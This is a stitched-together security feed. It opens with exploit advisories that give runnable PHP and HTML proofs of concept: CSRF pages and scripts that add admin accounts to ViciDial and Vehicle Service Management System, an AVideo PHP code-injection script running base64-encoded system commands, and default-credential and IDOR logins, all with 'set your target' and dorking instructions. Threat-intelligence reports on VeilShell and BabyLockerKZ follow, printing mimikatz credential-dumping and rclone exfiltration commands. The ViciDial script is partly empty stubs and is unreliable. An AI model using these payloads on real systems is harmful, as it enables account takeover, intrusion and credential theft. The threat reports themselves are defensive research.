ViciDial version 2.0.5 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : ViciDial Call Center - astguiclient - thirtieth public release 2.0.5 CSRF Add ADmin Vulnerability                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://github.com/inktel/Vicidial/archive/refs/heads/master.zip                                                            |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The following php code add new admin .[+] Line 172 set your target. ( $exploit = new VICIdialExploit('admin', 'password', 'http://127.0.0.1'); )[+] save code as poc.php .[+] USage : cmd = php poc.php .[+] PayLoad :<?phpclass VICIdialExploit {    private $username;    private $password;    private $targetUri;    private $headers;    public function __construct($username, $password, $targetUri) {        $this->username = $username;        $this->password = $password;        $this->targetUri = $targetUri;        $this->headers = array(            'Authorization' => 'Basic ' . base64_encode($username . ':' . $password)        );    }    public function check() {        $response = $this->sendRequest('GET', $this->targetUri . '/agc/vicidial.php');        if ($response['code'] != 200) {            return 'Unknown';        }        $version_info = $this->extractVersion($response['body']);        if (!$version_info) {            return 'Unknown';        }        $current_version = $this->compareVersion($version_info, '2.14-917a');        return ($current_version <= 0) ? 'Vulnerable' : 'Safe';    }    private function extractVersion($html) {        preg_match("/VERSION:\s*(\d+\.\d+)-(\d+)/", $html, $matches);        return isset($matches[0]) ? $matches[0] : null;    }    private function compareVersion($current, $vulnerable) {        return version_compare($current, $vulnerable);    }    public function exploit() {        $this->startService();        $this->authenticateAdmin();        $this->updateUserSettings();        $this->updateSystemSettings();        $campaignData = $this->createDummyCampaign();        $this->updateCampaignSettings($campaignData['id']);        $this->createDummyList($campaignData['list_name'], $campaignData['id']);        $phoneCreds = $this->fetchPhoneCredentials();        $this->agentPortalAuthentication($phoneCreds['extension'], $phoneCreds['password'], $campaignData['id']);        $this->insertMaliciousRecording($phoneCreds['recording_extension']);        $this->deleteDummyCampaign($campaignData['id']);        $this->waitForCronJob();    }    private function startService() {        // Starting HTTP service logic    }    private function sendRequest($method, $url, $body = null) {        $options = array(            'http' => array(                'method' => $method,                'header' => implode("\r\n", $this->headers)            )        );        if ($body) {            $options['http']['content'] = http_build_query($body);        }        $context = stream_context_create($options);        $result = file_get_contents($url, false, $context);        return array(            'code' => $http_response_header[0],            'body' => $result        );    }    private function authenticateAdmin() {        $response = $this->sendRequest('GET', $this->targetUri . '/vicidial/admin.php', array('ADD' => '3', 'user' => $this->username));        if ($response['code'] != 200) {            throw new Exception('Failed to authenticate with credentials.');        }        echo 'Authenticated successfully as user ' . $this->username;    }    private function updateUserSettings() {        $faker = new Faker\Generator();        $userSettings = array(            'ADD' => '4A',            'user' => $this->username,            'pass' => $this->password,            'full_name' => $faker->name,            'user_group' => 'ADMIN',            'phone_login' => $faker->userName,            'phone_pass' => $faker->password,            'active' => 'Y',            'vicidial_recording' => '1'        );        $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $userSettings);        echo 'Updated user settings';    }    private function updateSystemSettings() {        // Fetching system settings logic and making changes    }    private function createDummyCampaign() {        $faker = new Faker\Generator();        $campaignId = rand(100000, 999999);        $listId = $campaignId + 1;        $campaignName = $faker->company;        $campaignSettings = array(            'ADD' => '21',            'campaign_id' => $campaignId,            'campaign_name' => $campaignName,            'user_group' => '---ALL---',            'active' => 'Y'        );        $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $campaignSettings);        echo 'Created dummy campaign ' . $campaignName;        return array('name' => $campaignName, 'id' => $campaignId, 'list_name' => $campaignName . ' List', 'list_id' => $listId);    }    private function updateCampaignSettings($campaignId) {        $campaignSettings = array(            'ADD' => '41',            'campaign_id' => $campaignId,            'active' => 'Y',            'auto_dial_level' => '1'        );        $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $campaignSettings);        echo 'Updated dummy campaign settings';    }    private function createDummyList($listName, $campaignId) {        $listSettings = array(            'ADD' => '211',            'list_name' => $listName,            'campaign_id' => $campaignId,            'active' => 'Y'        );        $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $listSettings);        echo 'Created dummy list ' . $listName;    }    private function fetchPhoneCredentials() {        // Fetching phone credentials logic    }    private function agentPortalAuthentication($extension, $password, $campaignId) {        // Agent portal authentication logic    }    private function insertMaliciousRecording($recordingExtension) {        // Inserting malicious recording logic    }    private function deleteDummyCampaign($campaignId) {        $this->sendRequest('GET', $this->targetUri . '/vicidial/admin.php', array('ADD' => '61', 'campaign_id' => $campaignId, 'CoNfIrM' => 'YES'));        echo 'Deleted dummy campaign ' . $campaignId;    }    private function waitForCronJob() {        // Waiting for cron job logic    }}// Usage example:$exploit = new VICIdialExploit('admin', 'password', 'http://127.0.0.1');$exploit->check();$exploit->exploit();?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

ViciDial 2.0.5 Cross Site Request Forgery

Vehicle Service Management System version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Vehicle Service Management System 1.0 CSRF Add Admin Vulnerability                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/php/10641/online-vehicle-service-management-system                                        |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject new admin account.[+] Line 6 Set your Target.[+] Line 15+19 Set your user & pass.[+] save payload as poc.html[+] payload :<!DOCTYPE html> <html> <body> <script> function submitRequest()  { var xhr = new XMLHttpRequest();  xhr.open("POST", "http://localhost/vservice/classes/Users.php?f=save", true); xhr.setRequestHeader("Accept", "*\/*");  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true;  var body = "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"username\"\r\n" +  "\r\n" +  "indoushka\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"password\"\r\n" +  "\r\n" +  "Hacked\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"type\"\r\n" +  "\r\n" +  "1\r\n" +  "-------------------------------\r\n";  var aBody = new Uint8Array(body.length);  for (var i = 0; i < aBody.length; i++)  aBody[i] = body.charCodeAt(i);  xhr.send(new Blob([aBody]));  } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>  </body>  </html>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Vehicle Service Management System 1.0 Cross Site Request Forgery

Transport Management System version 1.0 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : Transport Management System 1.0 idor Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://www.kashipara.xyz/download/project/user/2022/202203/kashipara.com_transport-management-syste.zip           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /newvehicle.php[+] http://127.0.0.1/Transport-Management/newvehicle.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Transport Management System 1.0 Insecure Direct Object Reference

Printing Business Records Management System version 1.0 suffers from an ignored default credential vulnerability.

    =============================================================================================================================================| # Title     : Printing Business Records Management System v1.0 Insecure Settings Vulnerability                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202301/kashipara.com_pbrms-0-zip.zip                          |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] http://localhost/pbrms/admin/?page=system_infoGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Printing Business Records Management System 1.0 Insecure Settings

Online Eyewear Shop version 1.0 suffers from an ignored default credential vulnerability.

    =============================================================================================================================================| # Title     : Online Eyewear Shop v1.0 Insecure Settings Vulnerability                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.1 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202301/kashipara.com_php-oews-zip.zip                         |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] http://localhost/oews/admin/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Online Eyewear Shop 1.0 Insecure Settings

AVideo version 12.4 suffers from a PHP code injection vulnerability.

=============================================================================================================================================| # Title     : AVideo 12.4 php code injection Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://github.com/WWBN/AVideo/tree/master                                                                                  |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The following php code Upload shell file from external link.[+] Line 114 set your target.[+] Line 115 set your commands.[+] save code as poc.php .[+] USage : cmd = php poc.php .[+] PayLoad :<?phpclass indoushka{    private $target_uri;    private $payload;    public function __construct($target_uri, $payload)    {        $this->target_uri = $target_uri;        $this->payload = $payload;    }    public function exploit()    {        // إعداد الحمولة        $php_code = "<?php " . ($this->isArchPHP() ? $this->payload : "system(base64_decode('" . base64_encode($this->payload) . "'));") . " ?>";        $filter_payload = $this->generatePhpFilterPayload($php_code);        // إرسال الطلب        $data = http_build_query(['systemRootPath' => $filter_payload]);        $response = $this->sendRequest('POST', '/plugin/WWBNIndex/submitIndex.php', $data);        if ($response['code'] !== 200) {            echo "Server returned " . $response['code'] . ". Successful exploit attempts should not return a response.\n";        }    }    public function check()    {        $response = $this->sendRequest('GET', '/index.php');        if (!$response) {            return 'Failed to connect to the target.';        }        if ($response['code'] !== 200) {            return "Unexpected HTTP response code: " . $response['code'];        }        preg_match('/Powered by AVideo ® Platform v([\d.]+)/', $response['body'], $version_match);        preg_match('//m', $response['body'], $version_match);        if (empty($version_match[1])) {            return 'Unable to extract AVideo version.';        }        $version = $version_match[1];        $plugin_check = $this->sendRequest('GET', '/plugin/WWBNIndex/submitIndex.php');        if ($plugin_check['code'] !== 200) {            return 'Vulnerable plugin WWBNIndex was not detected';        }        if (version_compare($version, '12.4') >= 0 && version_compare($version, '14.2') <= 0) {            return "Detected vulnerable AVideo version: {$version}, with vulnerable plugin WWBNIndex running.";        }        return "Detected non-vulnerable AVideo version: {$version}";    }    private function sendRequest($method, $uri, $data = null)    {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $this->target_uri . $uri);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        if ($method === 'POST') {            curl_setopt($ch, CURLOPT_POST, true);            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        $response = curl_exec($ch);        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);        curl_close($ch);        return ['code' => $http_code, 'body' => $response];    }    private function isArchPHP()    {        // افترض أن الحمولة عبارة عن كود PHP        return true; // أو تحقق من ذلك بناءً على شروط معينة    }    private function generatePhpFilterPayload($php_code)    {        // يجب أن تضيف هنا منطق إعداد الحمولة (تصفية)        return $php_code; // قم بتعديل ذلك بناءً على متطلباتك    }}// مثال على كيفية الاستخدام:$target_uri = "http://target-url.com"; // أدخل عنوان الهدف هنا$payload = "<?php echo 'Hello World!'; ?>"; // الحمولة المراد استخدامها$indoushka = new indoushka($target_uri, $payload);$check_result = $indoushka->check();echo $check_result . "\n";$indoushka->exploit();?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

AVideo 12.4 Code Injection

Threat actors with ties to North Korea have been observed delivering a previously undocumented backdoor and remote access trojan (RAT) called VeilShell as part of a campaign targeting Cambodia and likely other Southeast Asian countries.
The activity, dubbed SHROUDED#SLEEP by Securonix, is believed to be the handiwork of APT37, which is also known as InkySquid, Reaper, RedEyes, Ricochet Chollima,

Cyber Espionage / Threat Intelligence

Threat actors with ties to North Korea have been observed delivering a previously undocumented backdoor and remote access trojan (RAT) called VeilShell as part of a campaign targeting Cambodia and likely other Southeast Asian countries.

The activity, dubbed **SHROUDED#SLEEP** by Securonix, is believed to be the handiwork of APT37, which is also known as InkySquid, Reaper, RedEyes, Ricochet Chollima, Ruby Sleet, and ScarCruft.

Active since at least 2012, the adversarial collective is assessed to be part of North Korea's Ministry of State Security (MSS). Like with other state-aligned groups, those affiliated with North Korea, including the Lazarus Group and Kimsuky, vary in their modus operandi and likely have ever-evolving objectives based on state interests.

A key malware in its toolbox is RokRAT (aka Goldbackdoor), although the group has also developed custom tools to facilitate covert intelligence gathering.

It's currently not known how the first stage payload, a ZIP archive bearing a Windows shortcut (LNK) file, is delivered to targets. However, it's suspected that it likely involves sending spear-phishing emails.

"The \[VeilShell\] backdoor trojan allows the attacker full access to the compromised machine," researchers Den Iuzvyk and Tim Peck said in a technical report shared with The Hacker News. "Some features include data exfiltration, registry, and scheduled task creation or manipulation."

The LNK file, once launched, acts as a dropper in that it triggers the execution of PowerShell code to decode and extract next-stage components embedded into it.

This includes an innocuous lure document, a Microsoft Excel or a PDF document, that's automatically opened, distracting the user while a configuration file ("d.exe.config") and a malicious DLL ("DomainManager.dll") file are written in the background to the Windows startup folder.

Also copied to the same folder is a legitimate executable named "dfsvc.exe" that's associated with the ClickOnce technology in Microsoft .NET Framework. The file is copied as "d.exe."

What makes the attack chain stand out is the use of a lesser-known technique called AppDomainManager injection in order to execute DomainManager.dll when "d.exe" is launched at startup and the binary reads the accompanying "d.exe.config" file located in the same startup folder.

It's worth noting that this approach was recently also put to use by the China-aligned Earth Baxia actor, indicating that it is slowly gaining traction among threat actors as an alternative to DLL side-loading.

The DLL file, for its part, behaves like a simple loader to retrieve JavaScript code from a remote server, which, in turn, reaches out to a different server to obtain the VeilShell backdoor.

VeilShell is a PowerShell-based malware that's designed to contact a command-and-control (C2) server to await further instructions that allow it to gather information about files, compress a specific folder into a ZIP archive and upload it back to the C2 server, download files from a specified URL, rename and delete files, and extract ZIP archives.

"Overall, the threat actors were quite patient and methodical," the researchers noted. "Each stage of the attack features very long sleep times in an effort to avoid traditional heuristic detections. Once VeilShell is deployed it doesn't actually execute until the next system reboot."

"The SHROUDED#SLEEP campaign represents a sophisticated and stealthy operation targeting Southeast Asia leveraging multiple layers of execution, persistence mechanisms, and a versatile PowerShell-based backdoor RAT to achieve long-term control over compromised systems."

Securonix's report comes a day after Broadcom-owned Symantec revealed that the North Korean threat actor tracked as Andariel targeted three different organizations in the U.S. in August 2024 as part of a financially motivated campaign.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Using New VeilShell Backdoor in Stealthy Cyber Attacks

The malware, called "BabyLockerKZ," has primarily affected users in Europe and South America.

*   Cisco Talos has discovered a financially motivated threat actor, active since 2022, recently observed delivering a MedusaLocker ransomware variant. 
*   Intelligence collected by Talos on tools regularly employed by the threat actor allows us to see an estimate of the amount and countries of origin of this group’s victims. This actor has been active since at least late 2022 and targets organizations worldwide, although the number of victims was higher than average in EU countries until mid-2023 and, since then, in South American countries.
*   This threat actor was observed distributing a MedusaLocker ransomware variant known as “BabyLockerKZ.” This variant is compiled with a PDB path containing the word “paid\_memes” which is also present in other tools observed during the attacks, presumably by the same author.
*   Talos has new information on the attacker’s tools, including BabyLockerKz and attacker TTPs and IOCs to assist in detecting and preventing further attacks.

Talos has recently observed an attack leading to the deployment of a MedusaLocker ransomware variant known as “BabyLockerKZ.” The distinguishable techniques — including consistently storing the same set of tools in the same location on compromised systems, the use of tools that have the PDB path with the string “paid\_memes,” and the use of a lateral movement tool named “checker” — used in the attack led us to take a deeper look to try to understand more about this threat actor. 

This attacker uses several publicly known attack tools and living-off-the-land binaries (LoLBins), a set of tools built by the same developer (possibly the attacker) to assist in credential theft and lateral movement in compromised organizations. These tools are mostly wrappers around publicly available tools that include additional functionality to streamline the attack process and provide graphical or command-line interfaces. 

The same developer built the MedusaLocker variant used in the initial attack. This variant that uses the same chat and leak site URLs contains several differences to the original MedusaLocker ransomware, such as a different autorun key or an extra public and private key set stored in the registry. Based on the name of the autorun key, the attackers call this variant “BabyLockerKZ.” 

We assess with medium confidence that the actor is financially motivated, likely working as an IAB or an affiliate of a ransomware cartel, and has been carrying out attacks since at least 2022. Our telemetry indicates that the actor opportunistically targeted many victims worldwide. In late 2022 and early 2023, most victims were in European countries, but since the first quarter of 2023, the group’s focus shifted toward South American countries and, as a result, the number of victims per month almost doubled.

**Tracking BabyLockerKZ across the globe**

Intelligence collected by Talos on tools regularly employed by the threat actor allows us to estimate the number of, and the countries of origin of the victims. Although this is unlikely to capture all of the adversary’s activities, it still provides a look at a specific window of activity.

The actor has been active since at least October 2022. At that time, the targets were mostly located in European countries such as France, Germany, Spain or Italy. During the second  quarter of 2023, the attack volume per month almost doubled, and the group shifted its focus toward South American countries such as Brazil, Mexico, Argentina and Colombia, as shown in the chart below. The attacks kept a steady volume of around 200 unique IPs compromised per month until the first quarter of 2024 when the attacks decreased.

The actor has consistently compromised a large number of organizations, often more than 100 per month, since at least 2022. This reveals the professional and highly aggressive nature of the attacks and is coherent with the activity we would expect from an IAB or ransomware affiliate.

During the attack leading to the deployment of the BabyLockerKZt, the adversary used several publicly known attack tools and others that could be unique to this actor. The group frequently used the Music, Pictures or Documents user folders of compromised systems to store attack tools. For example, the following paths were used to store tools during this attack:

*   c:\\users\\<user>\\music\\advanced\_port\_scanner\_2.5.3869.exe
*   c:\\users\\<user>\\music\\hrsword\\hrsword install.bat
*   c:\\users\\<user>\\music\\killav\\build.004\\disabler.exe
*   c:/users/<user>/music/checker/checker(222).exe
*   c:/users/<user>/music/checker/invoke-thehash.ps1
*   c:/users/<user>/music/checker/checker (222).exe
*   c:/users/<user>/music/checker/invoke-smbexec.ps1
*   c:/users/<user>/music/checker/invoke-wmiexec.ps1
*   c:/users/<user>/appdata/roaming/ntsystem/ntlhost.exe.exe
*   c:/users/<user>/appdata/local/temp/advanced port scanner 2/advanced\_port\_scanner.exe
*   c:/users/<user>/appdata/local/temp/is-juad3.tmp/advanced\_port\_scanner\_2.5.3869.tmp

These are similar to a previous attack leading to MedusaLocker ransomware, documented by ASEC in February 2023, which our telemetry suggests was a more active period for this threat actor.

Some of the publicly known tools used by the attacker are:

*   HRSword\_v5.0.1.1.rar: A tool used to disable AV and EDR software.
*   Advanced\_Port\_Scanner\_2.5.3869.exe: A network-scanning tool with several additional features to map internal networks and devices.
*   Netscan.exe: SoftPerfect Network Scanner: A tool similar to Advanced Port Scanner.
*   Processhacker.exe: Process Monitoring and administration software. Allows a TA to enumerate and control processes running on the infected endpoint.
*   PCHunter64.exe: A tool similar to processhacker.
*   Mimikatz: A tool to dump Windows user credentials from memory.

While most of the tools the attacker uses are publicly available, they also use some tools that are not widely distributed that streamline the attack process by automating the interaction between popular attack tools (e.g., Mimikatz, Invoke-the-hash, PSEXEC, RDP) and by adding convenient functionality and interfaces. One of these tools, called “Checker” used in an attack that deployed BabyLockerKZ, consisted of pivotal characteristics of BabyLockerKZ, the “Checker” tool has a PDB path containing the string “**paid\_memes**”. Pivoting off this string, we identified files on VirusTotal, of which most are BabyLockerKZ samples. We also discovered several other tools, which we’ll outline below.

Checker (E:\\**paid\_memes**\\wmi\_smb\_rdp\_checker\\Release\\checker.pdb) is an app that bundles several other freely available apps and provides a GUI for management of credentials as the attackers proceed with lateral movement. In particular it contains a set of tools:

*   Remote Desktop Plus
*   PSEXEC
*   MIMIKATZ

And a set of scripts based on the Invoke-TheHash tool.

The tool also contains a GUI, as shown below, and a database to store the credentials.

As the image illustrates, the tool can be used to scan IPs for valid credentials using several protocols/techniques (PSEXEC, RDP, SMB and WMI) and is prepared to import data from lists of hosts and some of the tools in the attacker toolset, such as Mimikatz, as well as an advanced port scanner. The tool can also decrypt hashes and offers the convenience of a GUI to store a database of the hosts and respective credentials that have been obtained or verified.

**PTH project**

The PTH (D:\\Projects\\**paid\_memes**\\PTH\\Release\\PTH.pdb) name suggests the pass-the-hash technique to use NTLM hashes to authenticate remotely without having to crack the password. Looking at its resources it embeds:

*   Invoke-SMBClient.ps1
*   Invoke-SMBEnum.ps1
*   Invoke-SMBExec.ps1
*   Invoke-TheHash.ps1
*   Invoke-WMIExec.ps1

These were also used in the checker tool and are part of Invoke-TheHash. According to the author: 

_“Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.”_

MIMIK (D:\\Projects\\**paid\_memes**\\mimik\\Release\\stub\_mimik.pdb) is a wrapper around Mimikatz and rclone that can be used to steal credentials and automatically upload them to an attacker-controlled server. The following image shows the terminal output for the tool.

The following command lines are examples of commands executed via the tool:

*   64.exe privilege::debug sekurlsa::logonPasswords token::elevate lsadump::sam full exit 
*   C:\\Users\\user\\Desktop\\64.exe 64.exe "privilege::debug" "sekurlsa::logonPasswords" "token::elevate" "lsadump::sam full" exit 
*   64.exe "privilege::debug" "sekurlsa::logonPasswords" "token::elevate" "lsadump::sam full" exit
*   C:\\Users\\user\\Desktop\\rclone.exe rclone rcd --rc-no-auth --bwlimit=30M
*   C:\\Users\\user\\Desktop\\rclone.exe rclone rc operations/stat

**BabyLockerKZ**

BabyLockerKZ is a variant of MedusaLocker that has been around at least since late 2023 and has been analyzed by other researchers, although not specifically called out as a MedusaLocker variant with this name. 

A Cynet blog post on the malware used the name “Hazard” for a MedusaLocker variant (named after the extension used for encrypted files) and mentions the existence of the BabyLockerKZ registry key. 

Another post from Whitehat mentions the existence of PAIDMEMES PUBLIC and PRIVATE registry keys on a MedusaLocker sample. 

This variant has not been given much attention outside of that, though, possibly because it’s highly similar to MedusaLocker or because it uses the same chat and leak sites as MedusaLocker. But there are several notable differences between BabyLockerKZ and MedusaLocker, such as:

*   No {8761ABBD-7F85-42EE-B272-A76179687C63} mutex.
*   No MDSLK reg key.
*   The PAIDMEMES Public and private keys.
*   The BabyLockerKZ run key.

The use of the PAIDMEMES public and private keys is unclear. In their post, Whitehat mentioned that they believe the keys aren’t necessary for the encryption process, as the Linux version doesn’t use them. Further research into the use of these keys might be a topic for another blog post.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

**Open-source Snort Subscriber Rule Set** customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. SIDs for this threat: Snort3 Rules: 1:300998:1:0 Snort2 Rules: 1:63928:1:0, 1:63929:1:0

**ClamAV** detections are also available for this threat:  
Win.Ransomware.MedusaLocker-10035000-1  
Win.Tool.PassTheHash-10034996-0  
Win.Ransomware.MedusaLocker-10035000-0

**Indicators of Compromise**

IOCs for this research can be found at our Github repository here

**BabylockerKZ:**

33a8024395c56fab4564b9baef1645e505e00b0b36bff6fad3aedb666022599a

b8c994e3ed7dcc9080916119ddc315533c129479f508676d7544b82b2e24745f

63eb3d2886d9cb880c9b0d54b94f3e149b3b5b6215a33a0ef63588a09dcd4499

270c3354b3ee2940b499e365eaba143fba9d458f434dc38e663dc0f08e96121e

759b96f44806578cc0836a3a2bf11c8bc553effac72f8d28b94aec78b66be906

**PTH:**

9f066975f1e02b29c7c635280f405c59704ce4f4e06b04e9ac8a7eac22acd3c7

8bc455e5de35290f8a94376357947bd72aaf6f4d452c25a8ef444e037ef76b9f

**Checker:**

d00f7cf6af68ba832b9d364f28411346cfe66fd3b1f5bcac318766add29ff7f0

1f2df15442593b159e45d16a27e4d43d3a9062da212a588ba4c048f214a0b7be

1e9246e6a35731143368eaa0ade4f3cf576d6b22e6090152f6e94f1fa3070651

6ae3a58a78be9c606009c657de4e390538b21ad951e62b6f4d31138e1a75732c

2eddfe711c32ef1668e14a10d00452c83c29e394e17c41f491550a1583c1bcac

**HOHOL1488:**

dc4840a0992b218cbedd5a7ac5c711cb98f1f9e78a8ffdea37c694061dfd34c6

48046fb0e566f5a2d184f84b76d6cadc458762556daed0ae4a3a1200afbefb54

c0c726a23111c220d022fcd01a85f9788249e42baece03f83b6059170453b801

012657c4548d9c98223caa4cc7aa52fc083d6983d42fde16ca3271412e7fe3fe

8edbb1944d94ff91ee917c31590b6d1d5690a52fc153e44355ee9749aa0f4625

364f1b7466d8e4c9f55294ecf1f874c763bcf980c59b0250c613ac366def6aca

5d5d639fdfbf632bb7d9f1bb28731217d09d36078ab5e594baf2a5a41267a5d2

**PDB list:**

d:/projects/paid\_memes/virus/release/stub.pdb

e:/locker/bin/stub\_win\_x64\_encrypter.pdb

i:/locker/bin/stub\_win\_x64\_encrypter.pdb

d:/education/locker/bin/stub\_win\_x64\_encrypter.pdb

d:/education/locker/bin/stub\_win\_x86\_encrypter.pdb

d:/projects/paid\_memes/wmi\_smb\_rdp\_checker/release/checker.pdb

d:/projects/paid\_memes/mimik/release/stub\_mimik.pdb

i:/locker/x64/release/phantom.pdb

d:/projects/paid\_memes/pth/release/pth.pdb

**Registry keys:**

HKEY\_USERS\\%SID%\\SOFTWARE\\PAIDMEMES\\PRIVATE

HKEY\_USERS\\%SID%\\SOFTWARE\\PAIDMEMES\\PUBLIC

HKEY\_CURRENT\_USER\\SOFTWARE\\PAIDMEMES\\PUBLIC

HKEY\_CURRENT\_USER\\SOFTWARE\\PAIDMEMES\\PRIVATE

HKCU\\SOFTWARE\\PAIDMEMES\\PUBLIC

HKCU\\SOFTWARE\\PAIDMEMES\\PRIVATE

HKEY\_CURRENT\_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\BabyLockerKZ

HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\BabyLockerKZ

HKEY\_USERS\\%SID%\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\BabyLockerKZ

**Extension names observed being used by BabyLockerKZ samples:**

crypto125

crypto1317

crypto165

crypto41

crypto76

encrypted1

hazard11

hazard21

hazard23

hazard24

hazard25

hazard27

hazard31

hazard38

hazard49

hazard55

hazard56

hazard7

infected

lock2

lock3

lock5

locked9

lockfiles

meduza210

rapid1

rapid10

readtext13

readtext47

readtext49

recovery29

recovery70

virus2

virus3

virus57

**Encryption key BabyLockerKZ:**

PUTINHUILO1337

**MUTEX BabyLockerKZ:**

HOHOL1488

Threat actor believed to be spreading new MedusaLocker variant since 2022

This article explores the Linux vulnerability discovered by Simone Margaritelli, which, according to cybersecurity companies Uptycs and Akamai,…

This article explores the Linux vulnerability discovered by Simone Margaritelli, which, according to cybersecurity companies Uptycs and Akamai, can be exploited for additional malicious purposes, including RCE and DDoS attacks against the Common Unix Printing System (CUPS).

Hackread.com recently **reported** a critical Linux vulnerability, discovered by cybersecurity researcher Simone Margaritelli (aka **evilsocket**), which could allow attackers to gain complete control of GNU/Linux systems, potentially allowing Linux Remote code execution. This decade-old flaw affects all GNU/Linux systems and has a severity score of 9.9 out of 10, indicating immense potential for damage if exploited. 

As per the latest updates, new findings from Cloud computing giant, Akamai, and cybersecurity firm, Uptycs, highlight an even more immediate concern: exploiting the issue for devastating DDoS attacks and carrying out remote code execution (RCE) in Linux.

****Uptycs Research****

Uptycs threat research team **identified** vulnerabilities in CUPS (Common UNIX Printing System), which can be exploited to install malicious printers and execute unauthenticated remote code execution attacks. CUPS is a widely used open-source printing system for Linux and Unix-like operating systems, allowing users to share printers on a network and manage printing jobs. 

The vulnerability resides in the cups-browsed daemon, a component that searches for available network printers. An attacker can exploit this flaw by sending a malicious packet to a vulnerable CUPS service. This packet tricks the service into fetching a non-existent printer description file from a target server specified by the attacker.

According to researchers, attackers can create a malicious PPD file and send it to a vulnerable CUPS server, requiring the cups-browsed daemon to be enabled, UDP port 631 open, and the victim to print to the malicious printer.

****Akamai Research****

